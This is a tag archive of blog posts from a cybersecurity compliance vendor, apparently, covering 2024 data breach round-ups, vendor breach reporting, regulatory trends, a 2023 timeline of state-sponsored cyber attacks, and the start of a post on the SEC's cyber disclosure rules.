Tag Archives: cybersecurity

May 2024 Data Breach Round Up

Discover the latest major data breaches in May 2024, impacting organizations like Ticketmaster, Santander, BBC, Cooler Master, and Singing River Health System, and learn about the critical need for enhanced cybersecurity measures.

The Rising Tide of Data Breaches in 2024

This past month, a series of significant data breaches have highlighted the vulnerabilities in the cybersecurity measures of various organizations. From healthcare systems to prominent companies, the exposure of sensitive personal information has caused widespread concern. Among the most notable incidents, Singing River Health System in Mississippi experienced a severe ransomware attack that compromised the data of nearly 900,000 individuals. This breach, along with others involving prominent entities like Ticketmaster and Cooler Master, underscores the critical need for robust data protection strategies. The following summaries detail these incidents and the implications for affected individuals and organizations.

Massive Data Breach at Ticketmaster Exposes Personal Information of 560 Million Users

Ticketmaster experienced a significant data breach, confirmed by Live Nation, following the compromise of a third-party cloud database, likely Snowflake. Discovered on May 20, 2024, the breach led to a criminal actor offering Ticketmaster user data for sale on the dark web a week later. The stolen data, allegedly 1.3TB in size, includes detailed personal information and ticketing data for 560 million users. The hacker group, Shiny Hunters, claimed responsibility, stating they accessed the data using stolen credentials and unexpired tokens from a Snowflake employee’s ServiceNow account. Despite this, Ticketmaster believes the breach won’t materially impact its operations. Snowflake attributed the breaches to weak customer account security, lacking multi-factor authentication, and has provided indicators of compromise to affected customers.

Santander Hacked: Data of 30 Million Customers and Employees Compromised

Hackers, identified as the ShinyHunters group, are attempting to sell data purportedly belonging to millions of Santander staff and customers. This group, which also claimed responsibility for the recent Ticketmaster breach, has accessed data from Santander’s branches in Chile, Spain, and Uruguay, affecting current and former employees globally. While no transactional data or online banking credentials were compromised, the breach includes bank account details, credit card numbers, and HR information. Santander is contacting affected individuals directly and assures that their banking systems remain secure. Researchers link this breach to a larger hack of the cloud storage company Snowflake, where hackers allegedly used stolen credentials to access a demo account of a former employee. Snowflake denies any vulnerability in its product, stating the compromised account did not contain sensitive data.

BBC Pension Scheme Data Breach: Personal Details of 25,000 Members Stolen

On May 21, the BBC’s information security team discovered a data breach involving personal details of BBC Pension Scheme members. The breach, which occurred via a cloud-based storage service, exposed names, National Insurance numbers, dates of birth, gender, and home addresses, but no financial or login information. The incident has been reported to relevant authorities, and affected individuals were notified on May 29. The BBC has secured the data source and enhanced security measures. There is no current evidence of misuse of the stolen data. The BBC advises vigilance against unsolicited communications and offers affected members two years of free access to Experian Identity Plus for monitoring and protection.

Cooler Master Suffers Major Data Breach: Personal Information of 500,000 Customers Exposed

Cooler Master, a Taiwanese computer hardware manufacturer, experienced a data breach on May 19, 2024, where a threat actor named ‘Ghostr’ claimed to have stolen 103 GB of data. This breach exposed personal information of over 500,000 Fanzone members, including names, addresses, dates of birth, phone numbers, email addresses, and unencrypted credit card details. The breach reportedly occurred through one of Cooler Master’s front-facing websites, allowing the attacker to access various databases. Despite attempts to extort the company, Cooler Master did not respond. A sample of the stolen data confirmed the legitimacy of customer support records. However, the claim of stolen credit card information remains unverified. Cooler Master has yet to comment on the incident.

Ransomware Attack on Singing River Health System Affects 895,000 Individuals

Singing River Health System in Mississippi has confirmed that a ransomware attack in August 2023 affected the personal data of 895,204 individuals. This attack, perpetrated by the Rhysida ransomware gang, caused significant operational disruptions and data theft from Singing River’s hospitals, hospices, pharmacies, imaging centers, specialty centers, and clinics. The stolen data includes full names, dates of birth, physical addresses, Social Security Numbers, and medical and health information. While there is no evidence of misuse of the exposed data, Singing River is offering 24 months of credit monitoring and identity restoration services through IDX. The gang has leaked around 80% of the stolen data, totaling 754 GB. Impacted individuals are advised to use the offered services, stay vigilant against unsolicited communications, and monitor their accounts for suspicious activities.

Strengthening Cybersecurity Amidst Escalating Data Breach Incidents

 

The alarming frequency and scale of recent data breaches underscore the critical need for enhanced cybersecurity measures across all sectors. The attacks on Singing River Health System, Ticketmaster, Cooler Master, and other organizations reveal not only the sophistication of cybercriminals but also the significant impact on personal data security. As these entities work to mitigate the damage and protect their stakeholders, it is essential for individuals to remain vigilant and proactive in safeguarding their information. The collective response to these breaches will shape the future landscape of data security, highlighting the importance of both technological advancements and user awareness in combating cyber threats.

February 2024 Data Breach Round Up

Supply chain security concept illustration

From Healthcare to Finance: The Shocking Cybersecurity Wake-Up Call of February 2024

Lately, it feels like we’ve been hit by a wave of cybersecurity incidents that have really shaken things up. It’s not just a bunch of breaches we’re talking about here; we’re seeing huge, flashing signs telling companies it’s high time to beef up their cybersecurity defenses and get smarter about how they handle incidents when they happen. In this blog, I’ll dive into the chaos of these cyber incidents, break down their effects, and tease out the valuable lessons they’re teaching us. So, come along for the ride and read up about the top breaches of February! 


  1. Change Healthcare


Change Healthcare, a subsidiary of UnitedHealth Group, experienced a cybersecurity incident on February 21, 2024, that has led to significant disruptions across the U.S. healthcare sector, affecting hospitals, pharmacies, and millions of patients. This breach, described by government and industry officials as one of the most severe attacks on the health-care system in U.S. history, has highlighted critical vulnerabilities within the U.S. healthcare infrastructure. Change Healthcare, crucial for processing 15 billion claims amounting to over $1.5 trillion annually, acts as an intermediary between healthcare providers and insurers. The attack has not only compromised patient data but has also strained the financial operations of healthcare organizations reliant on Change’s services for billing and reimbursement.


The ramifications of this incident are widespread, with some hospitals unable to discharge patients due to medication access issues and others facing severe financial strains. Senate Majority Leader Charles E. Schumer has called for expedited payments to affected healthcare providers to mitigate the financial impact. Despite efforts to manage the situation, including temporary assistance from Optum and manual claims processing, the industry faces “very, very imperfec t workarounds,” according to Molly Smith from the American Hospital Association. The attack underscores the urgent need for enhanced cybersecurity measures across the healthcare ecosystem to prevent future disruptions and safeguard patient information.


In a company update, they confirm that they are “experiencing a cybersecurity issue perpetrated by a cybercrime threat actor who has represented itself to us as ALPHV/Blackcat.”


  1. Unlocking the Impact: Fidelity’s Third-Party Vendor Vulnerability Exposed


On February 13, 2024, Fidelity Investments Life Insurance Company and Empire Fidelity Life Insurance Company discovered a cybersecurity incident involving their third-party vendor, Infosys McCamish Systems (IMS), which may have impacted the security of personal information belonging to approximately 28,268 people. IMS, responsible for administering certain life insurance policies for a limited number of customers, experienced a cybersecurity event when an unauthorized third party gained access to IMS systems between October 29, 2023, and November 2, 2023, potentially compromising data including names, Social Security Numbers, dates of birth, and bank account details used for premium payments. 


  1. Medical Management Resource Group: Eyes Wide Open

American Vision Partners, a company specializing in providing administrative support to ophthalmology practices, has recently addressed a significant cybersecurity breach affecting patient information. On February 15, 2024, the company sent out notification letters explaining that on November 14, 2023, the organization detected unauthorized access within its network infrastructure. Immediate action was taken to mitigate the breach by isolating the affected systems, initiating a thorough investigation with the help of leading cybersecurity experts, and notifying law enforcement authorities. Despite these efforts, it was confirmed by December 6, 2023, that the breach led to unauthorized access to personal data of patients linked to the practices serviced by American Vision Partners. The compromised data encompasses a range of sensitive information, including names, contact details, dates of birth, Social Security numbers, and specific medical and insurance details. 


It has also come to light that not only patients but also employees of the affected organization were victims of a data breach. The compromised information varies among individuals but could include a range of personal details such as names, contact information, dates of birth, Social Security numbers, driver’s license and passport details, and even bank account numbers. While not every piece of information was accessed for each individual, the breach’s potential impact is taken with utmost seriousness. In response, the organization is proactively offering identity protection and credit monitoring services to all impacted employees for two years at no charge, demonstrating a commitment to the security and welfare of its personnel. 


About 2,264,157 individuals were impacted by this incident. 


  1. Spark Driver: A Rough Road for Walmart’s Workforce

On February 23, 2024, Walmart Inc. notified employees about a recent security incident that has impacted Spark Driver™ accounts. This breach, discovered in late January, allowed unauthorized access to employees’ driver profiles, potentially compromising sensitive information, including Social Security Numbers, drivers licenses, dates of birth, names, and contact details. The breach provided the intruder with the ability to view details about earnings, tax information, driver verification documents, and background checks.


  1. LoanDepot: A Flood of Personal Data at Risk


LoanDepot issued a notice on February 23, 2024, regarding a data breach that potentially compromised sensitive personal information of almost 17 million people due to unauthorized access to its systems. This security incident was first identified on January 4, 2024, prompting immediate actions to contain and address the breach, including contacting law enforcement and initiating a thorough investigation with external cybersecurity experts. The breach, occurring between January 3 and January 5, 2024, may have exposed personal details such as names, addresses, email addresses, financial account numbers, Social Security numbers, phone numbers, and dates of birth.


In response to this incident, LoanDepot has taken significant measures to secure its systems and mitigate any potential impact on affected individuals. Although there is currently no evidence to suggest that the accessed information has been used maliciously, LoanDepot is offering 24 months of complimentary identity protection and credit monitoring services through Experian. This service is designed to assist in detecting and resolving identity theft and fraud. Affected individuals are encouraged to follow the provided instructions to enroll in these protection services to safeguard their personal information.


  1. UNITE HERE: A Union Under Siege


UNITE HERE, representing a substantial workforce across the U.S. and Canada, has formally reported a data breach to the Maine Attorney General on February 23, 2024, following the detection of unauthorized access to its IT network. The breach was discovered on October 20, 2023, when it was found that an unauthorized entity had gained access to their systems, impacting about 791,273 individuals. The potentially compromised information includes a wide array of personal data such as names, Social Security numbers, driver’s licenses, state ID numbers, alien registration numbers, tribal identification numbers, passport numbers, birth certificates, dates of birth, marriage licenses, signatures, financial account information, and medical data. 


Although there is no current evidence to suggest that this breach has led to identity theft or fraud, UNITE HERE is proactively informing affected individuals and has implemented several security measures. These measures include resetting system passwords, enhancing security protocols, and cooperating with law enforcement to prevent future incidents.


  1. Xerox Corporation: Copying Catastroph


On February 20, 2024, Xerox issued an alert regarding a security breach within its subsidiary, Xerox Business Services (XBS), emphasizing that safeguarding the data privacy and protection of its clients, partners, and employees remains a paramount concern. In early December 2023, an unauthorized entity managed to infiltrate a segment of the XBS network. Despite the swift detection and containment efforts by Xerox personnel, the investigation revealed that on December 10, 2023, the intruder succeeded in extracting a limited set of data from XBS’s systems.


The compromised information primarily includes names, contact details, and Social Security numbers of those affected. Xerox is actively conducting a comprehensive investigation into the breach and has already involved law enforcement agencies. Despite the ongoing legal probe, Xerox has chosen to promptly inform all impacted parties, underscoring its commitment to transparency and the importance of immediate action to address the security incident.


  1. PJ&A: Confidentiality on the Line


Perry Johnson & Associates, Inc. (PJ&A), a provider of medical transcription services for healthcare organizations including Concentra Health Services, Inc. (Concentra), has reported February 8th, a security incident affecting certain patient information. This incident, which did not affect Concentra’s systems directly, resulted from unauthorized access to PJ&A’s systems between March 27, 2023, and May 2, 2023. Notably, on April 7 and April 19, 2023, an unauthorized actor accessed a system containing Concentra patients’ information.


Upon detecting suspicious activity, PJ&A promptly initiated an investigation with cybersecurity experts to assess the incident’s scope and impact. The investigation identified that personal information, such as names and addresses, of almost 13 million Concentra patients was potentially compromised. Following the investigation, PJ&A informed Concentra, which then undertook efforts to verify affected patients and expedite notification.


To mitigate potential risks and support affected individuals, PJ&A is offering credit monitoring services through IDX for a specified period at no cost. Individuals are advised to remain vigilant by monitoring their account statements and credit reports for any suspicious activity and to consider enrolling in the provided credit monitoring service. Detailed instructions for enrollment and additional protective measures are included in PJ&A’s communication to the impacted parties.


  1. Verizon: An Inside Job


Verizon, one of the largest telecommunications service providers in the US has issued a notification concerning unauthorized access to certain personal information of its employees by one of its employees, in breach of company policies. This incident, identified around September 21, 2023, but addressed in February to the Maine Attorney General, involved unauthorized acquisition of a file containing employee data such as names, addresses, Social Security numbers or other national identifiers, gender, union affiliations, dates of birth, and compensation details. Currently, there is no indication that this information has been misused or disseminated outside of Verizon.


In response to this incident, Verizon undertook an immediate review to ascertain the nature of the compromised information and has taken steps to enhance its technical controls to prevent similar incidents in the future. The company has also informed relevant regulatory bodies about the breach.




From the major upset at Change Healthcare to the breach in Verizon’s backyard, it’s pretty obvious we’re standing at a major fork in the road. These incidents aren’t just cautionary tales; they’re wake-up calls, highlighting just how crafty and relentless cyber threats have become, and just how tough our defenses need to be.  Each month, we compile a summary of the most significant breaches from the preceding period. Be sure to explore our latest round-up! At Findings, we streamline the process of cybersecurity compliance assessments, ensuring your systems adhere to pertinent regulations while safeguarding your infrastructure.




Automate Your Cybersecurity Compliance Journey

* indicates required
Your work email please

Vendor Breach Reporting in the Modern Market

Vendor Breach Reporting guidelines findings 2024

We’ve hit a point in time where data breaches are becoming more common and the repercussions more severe. This highlights that the importance of effective vendor breach reporting cannot be overlooked. As companies are relying more and more on third-party vendors for a variety of services — from cloud storage solutions to customer relationship management systems, the potential for data breaches originating from these vendors escalates. This blog will explore the current landscape of vendor breach reporting, highlighting the challenges, best practices, and the evolving regulatory environment that shapes how businesses respond to and report breaches.

Understanding the Landscape

The modern market is interconnected, with businesses routinely sharing sensitive information with vendors. This symbiotic relationship, however, introduces vulnerabilities. A breach at a vendor can have cascading effects, compromising the data integrity of all connected businesses. The 2023 Verizon Data Breach Investigations Report underscores this point, noting an uptick in incidents originating from third-party vendors.

Challenges in Vendor Breach Reporting

One of the primary challenges in vendor breach reporting is the detection and attribution of breaches. Identifying that a breach has occurred, and tracing it back to a specific vendor, requires sophisticated monitoring tools and a high degree of coordination between parties. Moreover, the variability in reporting requirements across jurisdictions adds a layer of complexity, making compliance a moving target for global businesses.

Best Practices for Effective Reporting

To navigate these challenges, businesses must adopt a proactive and comprehensive approach to vendor management and breach reporting. Key strategies include:

  • Due Diligence: Before entering into agreements with vendors, assess their security policies and incident response capabilities. Regular audits can ensure ongoing compliance with agreed-upon standards.

  • Transparent Communication: Establish clear lines of communication for reporting potential security incidents. This includes setting up contractual obligations for vendors to notify you immediately in the event of a breach.

  • Incident Response Planning: Develop a coordinated incident response plan that includes vendors. This plan should outline steps for breach investigation, notification, and mitigation, ensuring a swift and unified response.

  • Regulatory Compliance: Stay informed about the evolving regulatory landscape. Many regulations have set stringent requirements for data breach notification, including specific timelines and conditions under which breaches must be reported. Failure to comply can result in significant fines, legal fees, and damage to a company’s reputation.

The Evolving Regulatory Environment

Governments around the world are tightening regulations around data protection and breach notification. The trend is towards more stringent reporting requirements, with an emphasis on consumer protection. For instance, amendments to the GDPR and CCPA are pushing for shorter notification windows and greater transparency in the event of a breach. More recently, in 2024, The Federal Communications Commission (FCC) has finalized new breach reporting rules that significantly tighten the requirements for telecommunications carriers in the US. Now, these carriers have only seven days to disclose data breaches. The rules have expanded the definition of breaches to include inadvertent access or disclosure of customer information, which now encompasses not only Customer Proprietary Network Information (CPNI) but also personally identifiable information (PII) such as names, government ID numbers, biometric data, and email addresses/passwords. This change aims to cover a broader range of data and ensure customers are notified of breaches unless the carrier determines no harm is reasonably likely to occur. The updated rules now require that, in addition to the FBI and U.S. Secret Service, the FCC must also be notified of breaches.

Lastly, The Federal Trade Commission (FTC) has introduced an amendment to its Safeguards Rule, imposing a 30-day deadline for non-banking financial organizations to report incidents involving 500 consumers or more. This amendment aims to bolster consumer data security by demanding comprehensive incident reports, driving stronger security practices in the financial sector.

Closing Thoughts:

In the modern market, effective vendor breach reporting is not just a regulatory requirement; it’s a critical component of a company’s overall cybersecurity strategy. By implementing best practices for vendor management and staying abreast of regulatory changes, businesses can better protect themselves and their customers from the fallout of data breaches. As the digital landscape continues to evolve, so too must the strategies for safeguarding against and responding to security incidents. The key to resilience in the face of these challenges lies in preparation, partnership, and proactive engagement with the issue of vendor breach reporting.

 

Findings Can Help

2024 Trends Unveiled: Cybersecurity as a Key Business Enabler

As 2024 unfolds, we are witnessing a revolutionary transformation in the cybersecurity landscape. No longer a mere aspect of IT, cybersecurity is now a pivotal driver in reshaping business operations on a global scale. This blog post delves into the forefront of cybersecurity, compliance, highlighting pivotal regulations such as the ASEAN Guidelines on Consumer Impact Assessment (CIA), CMMC, PCI DSS 4.0, DORA, and SEC incident disclosure regulations. These emerging trends are rapidly becoming the gold standard in global business cybersecurity practices.

 

CMMC: Evolving from Defense to a Universal Cybersecurity Benchmark

  • The Cybersecurity Maturity Model Certification (CMMC) is evolving from its U.S. defense sector roots to a worldwide cybersecurity standard. Now applicable across various industries, CMMC’s layered cybersecurity approach is garnering universal acceptance. Its comprehensive framework, focused on continuous improvement, is especially vital for entities managing sensitive or critical data, signifying a move towards standardized cybersecurity excellence.

PCI DSS 4.0: Revolutionizing Payment Security Standards

  • PCI DSS 4.0 is revolutionizing payment security standards globally in 2024. This updated version introduces an adaptive, risk-based approach, essential for any business involved in digital transactions. Its flexibility and focus on tailored security measures are vital for e-commerce, financial institutions, and others in the payment ecosystem, making PCI DSS 4.0 compliance synonymous with secure and trustworthy payment processing.

DORA: Spearheading Digital Resilience in the Financial Sector

  • The Digital Operational Resilience Act (DORA) is a groundbreaking EU regulation shaping the financial sector’s approach to digital risks in 2024. Its influence extends globally, affecting financial entities interacting with the EU market. DORA emphasizes operational resilience, highlighting the need for robust digital risk management in today’s interconnected digital finance landscape.

SEC Incident Disclosure: Championing Transparency in Corporate Cybersecurity

  • The SEC’s incident disclosure regulations are leading a worldwide movement towards transparency in corporate cybersecurity. These mandates, which require prompt and detailed disclosure of cybersecurity incidents, are becoming critical for publicly traded companies globally. This shift towards transparency and accountability in cybersecurity reflects an increasing demand from investors and consumers for trustworthiness and integrity in corporate practices.

ASEAN CIA: Redefining Cybersecurity with a Consumer-Centric Approach

  • The ASEAN Guidelines on Consumer Impact Assessment, originating from Southeast Asia, are now setting a global precedent. These guidelines shift the focus towards assessing cybersecurity’s impact on consumers, prioritizing their rights and data privacy. This consumer-centric approach, especially critical for businesses in or targeting the ASEAN market, is now a global best practice. It underscores the imperative of balancing robust security with consumer rights, a notion gaining traction across various industries.

Other Regulatory Developments Shaping the Cybersecurity Domain

Additional global regulations also predict significant cybersecurity trends:

  • GDPR: Continues to influence data privacy and protection globally, impacting businesses handling EU citizens’ data.

  • ISO/IEC 27001: Gaining traction as a comprehensive framework for managing information security, key for organizations striving for global best practices.

  • NIST Framework: Increasingly adopted worldwide, indicating a move towards unified approaches in cybersecurity risk management.

Cybersecurity Compliance: A Strategic Business Advantage

In 2024, adherence to these emerging cybersecurity regulations offers businesses a strategic advantage. It transcends legal compliance, fostering trust, enhancing brand reputation, and providing a competitive edge. The integration of AI in cybersecurity is another emerging practice, offering efficient and effective solutions for meeting these standards.

  • Increased Focus on Supply Chain Attacks: Modern supply chains are interconnected and complex, making them susceptible to cyberattacks. A breach in one part can have a cascading effect, impacting multiple businesses. This emphasizes the need for rigorous cybersecurity measures across the entire supply chain.

  • Collaborative Risk Management: The trend towards collaborative defense strategies is based on the principle that sharing threat intelligence and best practices can strengthen the security posture of all involved parties. By learning from each other’s experiences, industries can develop more effective defenses against common threats.

State-Sponsored Cyber Attacks: An Escalating Concern

  • Global Ramifications: State-sponsored cyberattacks are particularly concerning due to their scale and impact. These attacks target critical infrastructure, such as energy grids or financial systems, and can compromise national security. The global nature of these threats requires an international response and cooperation.

  • Advanced Countermeasures: To combat these sophisticated threats, organizations need to implement advanced threat detection systems that can identify and neutralize attacks quickly. A zero-trust security model, where trust is never assumed and verification is required from everyone, can be crucial in mitigating these risks. Continuous monitoring ensures that any suspicious activity is detected and addressed promptly.

AI in Cybersecurity: A Complex Role

  • Enhanced Detection and Response: AI can significantly improve threat detection by analyzing vast amounts of data to identify patterns that may indicate a cyberattack. However, this technology can also be used by attackers to create more sophisticated threats, such as deepfakes or AI-driven phishing attacks.

  • Proactive Mitigation Strategies: Organizations must not only invest in AI-based defense systems but also ensure that their workforce is trained to recognize and respond to AI-generated threats. This includes understanding the limitations of AI and being able to identify when a human response is required.

Ransomware Evolution: The Changing Landscape of Cyber Extortion

  • Sophisticated Tactics: Modern ransomware attacks are more than just data encryption; attackers are now threatening to leak sensitive data if the ransom isn’t paid, adding an extra layer of coercion. This dual-threat approach makes it even more challenging for victims to decide whether to pay the ransom or risk public exposure of their data.

  • Comprehensive Defense Strategies: To protect against these evolving ransomware threats, organizations must have robust backup systems that can restore data with minimal loss. Employee training is crucial to help staff recognize and avoid potential ransomware attacks. Additionally, a well-prepared incident response plan can ensure quick action to mitigate damage if an attack occurs.

The Metaverse and Cloud Security: New Frontiers, New Risks

  • Expanded Attack Vectors: As businesses venture into new digital domains like the metaverse and cloud platforms, they face new cybersecurity challenges. These platforms can provide attackers with novel ways to exploit security vulnerabilities.

  • Proactive Security Measures: Ensuring security in these new environments involves a comprehensive approach that includes strong encryption to protect data, robust identity management to verify users, and regular security audits to identify and address vulnerabilities.

The Human Element: Bolstering the Frontlines of Cyber Defense

  • Empowering Through Training and Awareness: Regular and comprehensive training programs are essential in equipping employees with the necessary skills to recognize and prevent security breaches. This training should cover the latest cybersecurity threats and best practices.

  • Cultivating a Security-First Mindset: Creating a culture of security within the organization is crucial. This involves fostering an environment where employees are aware of the importance of cybersecurity and are motivated to take proactive steps to protect the organization’s digital assets.

As 2024 progresses, it’s clear that these cybersecurity trends and regulations are not just shaping, but redefining business strategies. From the consumer-centric ASEAN CIA guidelines to CMMC’s comprehensive security model, and the transparency demanded by SEC disclosure regulations, these developments are crucial in enabling businesses to thrive in the digital era. By staying ahead of these trends, companies can harness cybersecurity not only as a compliance requirement but as a cornerstone for growth and success. Understanding evolving regulations, embracing innovative technologies, and reinforcing human-centric defenses remain key to ensuring business resilience and triumph in an increasingly digitized world.

Analyzing the Rise of State Sponsored Cyber Attacks

Explore the global impact of state-sponsored cyber attacks through a detailed timeline of significant incidents since January 2023.

A Timeline & Global Impact of State-Sponsored Cyber Attacks: 

State-sponsored cyber attacks have become an increasingly prevalent threat in recent years. These attacks are often carried out by nation-states seeking to gain an advantage over their geopolitical rivals, whether by stealing sensitive information or disrupting critical infrastructure. Analyzing the rise of state-sponsored cyber attacks is a complex task that requires a deep understanding of the geopolitical landscape and the motivations of nation-states.

 It is important for governments and private organizations alike to invest in cybersecurity measures that can mitigate the risk of state-sponsored cyber attacks. This includes measures such as network segmentation, access controls, and regular security assessments.

Analyzing the Escalation of State-Sponsored Cyber Attacks:

The increasing prevalence of such attacks can be attributed to several factors. Firstly, the rapid digitization of essential infrastructure has amplified its susceptibility to cyber intrusions. Secondly, the emergence of sophisticated hacking collectives backed by nation-states has facilitated large-scale cyber offensive operations. Thirdly, the inherent anonymity of cyberspace impedes accountability, allowing malicious actors to operate with relative impunity. With actors increasingly targeting critical infrastructures, this has led to a doubling of such attacks over the past two years, costing organizations an estimated $1.6 million per incident. The threat landscape is evolving, particularly with the integration of cyber warfare in geopolitical conflicts like the Russo-Ukrainian war.

Nation-state actors are well-funded and highly skilled, primarily targeting government, military, think tanks, universities, and critical infrastructure providers. The impact of state-sponsored cyber attacks extends even further, hitting various sectors, such as healthcare, telecommunications, and defense, causing financial losses and intellectual property theft. These attacks have also blurred the lines between APTs and cybercrime, with state-backed groups engaging in cybercriminal activities for profit.

Below I’ve outlined a timeline of notable significant cyber incidents that have unfolded since January 2023, focusing on assaults targeting government bodies, defense organizations, high-tech enterprises, and economic crimes resulting in losses exceeding a million dollars. In this rapidly evolving landscape of cyber warfare and data breaches, this timeline provides a glimpse into the persistent and evolving threats that shape the world we live in today. If you’re interested in reading all of these events since 2006, read on here.



Timeline of Significant Cyber Incidents in 2023:

  • January 2023:

    • CISA, the NSA, and the Multi-State Information Sharing and Analysis Center release a joint advisory warning of an increase in hacks on the federal civilian executive branch utilizing remote access software.

    • Russia-linked hackers deploy a ransomware attack against the UK postal service, the Royal Mail.

    • Iran-linked hackers execute ransomware attacks and exfiltrate data from U.S. public infrastructure and private Australian organizations.

    • Hackers use ransomware to encrypt 12 servers at Costa Rica’s Ministry of Public Works.

    • Albanian officials report that its government servers were still near-daily targets of cyber-attacks after a major attack linked to Iranian hackers in 2022.

    • Hackers targeted Asia Pacific networks, using malware to access confidential data and captured audio from victim machines.

    • Malevolent actors distributed over a thousand emails with harmful links to government accounts in Moldova.

  • February 2023:

    • A pro-Russian hacker group claimed a DDoS attack on NATO networks, disrupting communications with earthquake relief airplanes at a Turkish airbase and temporarily disabling NATO’s sites.

    • North Korean hacking group conducted a covert espionage campaign between August and November 2022. They targeted various sectors, exfiltrating 100MB+ of data from each victim without detection. This group is linked to the North Korean government.

    • Latvian officials claim that Russian hackers launched a phishing campaign against its Ministry of Defense.

    • Iranian hacktivists claim responsibility for taking down websites for the Bahrain international airport and state news agency.

    • In a ransomware attack on Technion University, Israel’s leading technology education program, hackers demanded 80 bitcoin (equivalent to $1.7 million USD) to decrypt the university’s files. Israeli cybersecurity authorities attributed the attack to Iranian state-sponsored hackers.

    • Hackers disabled Italy’s Revenue Agency website and sent phishing emails to users, leading them to a fake login page resembling the official site.

    • Chinese cyberespionage hackers perform a spear-phishing campaign against government and public sector organizations in Asia and Europe. The emails

  • March 2023:

    • Russian hackers bring down the French National Assembly’s website using a DDoS attack.

    • CISA and FBI revealed that a U.S. federal agency was subjected to a cyberespionage campaign between November 2022 and January 2023. The hackers exploited a vulnerability in the agency’s Microsoft Internet Information Services (IIS) server to implant malware.

    • South Asian hacking group targets firms in China’s nuclear energy industry.

    • North Korean hackers target U.S.-based cybersecurity research firms.

    • Chinese cyber espionage group targets government entities in Vietnam, Thailand, and Indonesia.

    • Russian hackers launch social engineering campaigns targeting U.S. and European politicians, businesspeople, and celebrities.

    • Slovakian cybersecurity researchers discover a new exploit from a Chinese espionage group targeting political organizations in Taiwan and Ukraine.

    • Poland blames Russian hackers for a DDoS attack on its official tax service website.

  • April 2023:

    • Sudan-linked hackers conduct a DDoS attack on Israel’s Independence Day.

    • NSA cyber authorities report evidence of Russian ransomware and supply chain attacks against Ukraine and other European countries.

    • Iranian state-linked hackers target critical infrastructure in the U.S. and other countries.

    • Recorded Future releases a report revealing data exfiltration attacks against South Korean research and academic institutions.

    • Chinese hackers target telecommunication services providers in Africa.

    • Russia-linked threat group launches a DDoS attack against Canadian Prime Minister Justin Trudeau.

    • North Korea-linked hackers shift focus to espionage targeting defense industry firms in Eastern Europe and Africa.

    • Ukraine-linked hacktivists target the email of Russian GRU Unit26165’s leader.

  • May 2023:

    • Belgium’s cyber security agency links China-sponsored hackers to a spearfishing attack on a prominent politician.

    • Chinese hackers breach communications networks at a U.S. outpost in Guam.

    • Chinese hackers target Kenyan government ministries and state institutions.

    • Russia-linked hackers target government organizations in Central Asia.

    • Unidentified group hacks targets in both Russia and Ukraine for surveillance and data gathering.

  • June 2023:

    • Alleged group tied to private military corporation Wagner hacks a Russian satellite telecommunications provider.

    • Pakistani-based hacker group infiltrates the Indian army and education sector.

    • Pro-Russian hacktivists attack European banking institutions, including the European Investment Bank.

    • U.S. federal government agencies, including Department of Energy entities, breached in a global cyberattack by Russian-linked hackers.

    • Illinois hospital closes due to a ransomware attack.

    • Pro-Russian hackers target Swiss government websites, including those for Parliament and the federal administration.

    • North Korean hackers impersonate tech workers to steal funds for ballistic missiles program.

    • Ukrainian hackers attack a Russian telecom firm providing critical infrastructure to the Russian banking system.

    • Russia’s Federal Security Services allege Apple worked with US intelligence agencies to hack iPhones belonging to Russian users and foreign diplomats.

  • July 2023:

    • China claims an earthquake monitoring system in Wuhan was hacked by U.S. cybercriminals.

    • Kenyan eCitizen service disrupted by pro-Russian cybercriminals.

    • Russian-linked hackers target Ukrainian state services like the app “Diia.”

    • DDoS attack on the Ministry of Justice in Trinidad and Tobago disrupts court operations.

    • New Zealand’s parliament hit by a cyberattack from a Russian hacking group.

    • Russian hackers target twelve government ministries in Norway to gain access to sensitive information.

    • A South Korean government-affiliated institution falls victim to a phishing scandal.

    • Chinese-linked hackers infect a Pakistani government app with malware.

    • Chinese hackers breach emails of several prominent U.S. government employees.

    • Russian hackers target attendees of the latest NATO Summit in Vilnius.

    • Polish diplomat’s advertisement corrupted by Russian hackers to target Ukrainian diplomats.

  • August 2023:

    • Russian hacktivists launch DDoS attacks on Czech banks and the stock exchange, demanding they stop supporting Ukraine.

    • Unnamed hackers take down X (formerly Twitter) in several countries, demanding Starlink be opened in Sudan.

    • Cybercriminals sell a stolen dataset from China’s Ministry of State Security, compromising personal information for half a billion Chinese citizens.

    • Russian hacktivists launch DDoS attacks on Polish government websites, the Warsaw Stock Exchange, and Polish national banks.

    • Russian hackers disable Poland’s rail systems and transmit propaganda during the attack.

    • Chinese hackers target a U.S. military procurement system and Taiwan-based organizations.

    • Ukrainian hackers breach a senior Russian politician’s email and leak sensitive documents connecting him to illegal activities.

    • Ecuador’s national election agency faces cyberattacks during the latest election.

    • Suspected North Korean hackers attempt to compromise a joint U.S.-South Korean military exercise.

    • Bangladesh shuts down central bank and election commission websites to prevent cyberattacks.

    • Belarusian hackers target foreign embassies with disguised malware.

    • Chinese hackers obtain personal and political emails of a U.S. Congressman.

    • Iranian cyber spies target dissidents in Germany using false digital personas and credential harvesting.

    • Ukrainian hackers uncover Russian attempts to deploy custom malware against Starlink satellites.

    • Russian hackers launch a ransomware attack against a Canadian government service provider.

    • Canadian politician targeted by a Chinese disinformation campaign on WeChat.

    • Canadian government accuses a highly sophisticated Chinese state-sponsored actor of hacking a federal scientific research agency.

    • Russia’s military intelligence service attempts to hack Ukrainian Armed Forces’ combat information systems.

    • Russian hackers breach the UK’s Electoral Commission network.

    • North Korean hackers breach a Russian missile developer’s computer system.



The diverse array of targets, from critical infrastructures to government bodies, reveals a tumultuous digital landscape. To fortify our digital defenses against the onslaught of nation-state cyber activities, it is crucial that we advance technological innovation, foster international cooperation, and cultivate a culture of cybersecurity awareness.

The SEC’s New Cyber Rules

what every ciso needs to know about the new cybersecurity sec rules

What Every Public Company CISO Must Know:

The role of a Chief Information Security Officer (CISO) in public companies has never been more pivotal. With cyber threats escalating in scale and sophistication, the Securities and Exchange Commission (SEC) has rolled out new cyber regulations aimed at safeguarding investors, stakeholders, and the broader market. Given that the amendments took effect on September 5, 2023, it’s crucial for your organization to be informed. While the final rules are quite lengthy, I’ll offer a condensed and digestible version in this blog post to help you understand the key points – so make sure to read on!

The Backdrop:

Back in March 2022, the Commission took the bold step of introducing a suite of regulations. The intent was clear: fortify public company disclosures concerning cybersecurity. This encompassed key areas such as cyber threats, strategic countermeasures, governance structures, and insights into major cyber incidents.

